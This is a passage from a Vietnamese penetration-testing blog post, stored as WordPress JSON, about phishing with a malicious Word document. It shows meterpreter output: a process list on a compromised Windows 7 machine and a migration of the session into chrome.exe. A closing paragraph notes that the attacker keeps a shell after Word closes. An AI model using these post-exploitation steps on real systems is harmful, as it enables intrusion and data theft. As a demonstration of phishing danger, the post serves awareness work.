class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">vmtoolsd<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-46\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-cn\">2692<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">4016<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-v\">chrome<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">CL01<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">W7<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">user1<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-e\">Program <\/span><span class=\"crayon-v\">Files<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Google<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Chrome<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Application<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">chrome<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-47\" class=\"crayon-line\"><span class=\"crayon-cn\">2804<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">512<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">SearchIndexer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0<\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">SYSTEM<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">system32<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">SearchIndexer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-48\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-cn\">2896<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">512<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">wmpnetwk<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-e\">NETWORK <\/span><span class=\"crayon-i\">SERVICE<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-e\">Program <\/span><span class=\"crayon-v\">Files<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-e\">Media <\/span><span class=\"crayon-v\">Player<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">wmpnetwk<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-49\" class=\"crayon-line\"><span class=\"crayon-cn\">3200<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">628<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">WmiPrvSE<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">SYSTEM<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">system32<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">wbem<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">wmiprvse<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-50\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-cn\">3656<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">512<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">svchost<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">SYSTEM<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">System32<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">svchost<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-51\" class=\"crayon-line\"><span class=\"crayon-cn\">4016<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">2104<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-v\">chrome<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">CL01<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">W7<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">user1<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-e\">Program <\/span><span class=\"crayon-v\">Files<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Google<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Chrome<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Application<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">chrome<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-52\" class=\"crayon-line crayon-striped-line\"><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-53\" class=\"crayon-line\"><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-54\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-v\">meterpreter<\/span> <span class=\"crayon-o\">&gt;<\/span> <span class=\"crayon-i\">migrate<\/span> <span class=\"crayon-cn\">2104<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-55\" class=\"crayon-line\"><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-56\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">]<\/span> <span class=\"crayon-e\">Migrating <\/span><span class=\"crayon-i\">from<\/span> <span class=\"crayon-cn\">1552<\/span> <span class=\"crayon-st\">to<\/span> <span class=\"crayon-cn\">2104&#8230;<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-57\" class=\"crayon-line\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">]<\/span> <span class=\"crayon-e\">Migration <\/span><span class=\"crayon-e\">completed <\/span><span class=\"crayon-v\">successfully<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-58\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-v\">meterpreter<\/span> <span class=\"crayon-o\">&gt;<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-59\" class=\"crayon-line\"><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p>L\u00fac n\u00e0o Word tr\u00ean m\u00e1y n\u1ea1n nh\u1eadn \u00a0t\u1ef1 \u0111\u1ed9ng t\u1eaft \u0111i v\u00e0 tr\u00ean m\u00e1y t\u00ednh c\u1ee7a Attacker \u0111\u00e3 c\u00f3 meterpreter shell cho ph\u00e9p khai th\u00e1c t\u1ea5t c\u1ea3 th\u00f4ng tin tr\u00ean m\u00e1y n\u1ea1n nh\u00e2n. Qua b\u00e0i vi\u1ebft n\u00e0y c\u00e1c b\u1ea1n \u0111\u00e3 th\u1ea5y \u0111\u01b0\u1ee3c s\u1ef1 nguy hi\u1ec3m li\u00ean quan \u0111\u1ebfn vi\u1ec7c t\u1ea5n c\u00f4ng phishing c\u0169ng nh\u01b0 s\u1ef1 nguy hi\u1ec3m c\u1ee7a nh\u1eefng files t\u00e0i li\u1ec7u v\u0103n b\u1ea3n s\u1eed d\u1ee5ng h\u00e0ng ng\u00e0y.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Nh\u01b0 ch\u00fang ta \u0111\u00e3 bi\u1ebft phishing l\u00e0 h\u00ecnh th\u1ee9c g\u1eedi nh\u1eefng email c\u00f3 n\u00f4i dung l\u1eeba \u0111\u1ea3o \u0111\u1ebfn ng\u01b0\u1eddi d\u00f9ng trong h\u1ec7 th\u1ed1ng. Th\u1ef1c t\u1ebf cho th\u1ea5y r\u1eb1ng vi\u1ec7c t\u1ea5n c\u00f4ng v\u00e0o c\u00e1c h\u1ec7 th\u1ed1ng&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-308","post","type-post","status-publish","format-standard","hentry","category-pentest"],"_links":{"self":[{"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/posts\/308","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/comments?post=308"}],"version-history":[{"count":0,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/posts\/308\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/media?parent=308"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/categories?post=308"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/tags?post=308"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}